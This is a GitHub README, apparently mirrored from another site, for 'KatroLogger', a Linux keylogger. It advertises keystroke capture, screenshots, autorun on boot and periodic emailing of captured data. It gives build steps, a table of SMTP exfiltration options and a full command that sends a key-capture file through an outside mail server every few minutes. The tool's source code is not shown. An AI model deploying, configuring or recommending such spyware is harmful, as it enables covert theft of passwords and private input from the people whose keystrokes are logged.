Katrovisch / KatroLogger

KeyLogger for Linux Systems

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


KeyLogger for Linux Systems

Features

  • Runs on GUI systems or CLI
  • Sending data by email
  • Autorun on boot
  • Screenshots

Dependencies

Install libquickmail:

wget https://ufpr.dl.sourceforge.net/project/libquickmail/libquickmail-0.1.29.tar.xz
tar -xvf libquickmail-0.1.29.tar.xz
./autogen.sh && ./configure && make && make install

Install

./configure && make && make install

Usage

katrologger --output /path/file

Send data by e-mail

Argument Description
--smtp-status email sending status
--smtp-url SMTP server
--smtps-url SMTPS server
--port SMTP port
--mail-from source email
--pass password email
--mail-rcpt receipt email
--smtp-file attach key capture file for sending
--update update interval for sending email, 1-60 (minutes)
--screen screenshots (:0 is display default)
katrologger --smtps-url smtp.gmail.com --port 465 --mail-from <address> --mail-rcpt <address> --pass <password> --smtp-file /path/keyscan --time 10

Uninstall

make uninstall

License

KatroLogger is licensed under the GNU General Public License v3.0

About

KeyLogger for Linux Systems

License:GNU General Public License v3.0


Languages

Language:C 94.4%Language:Makefile 5.6%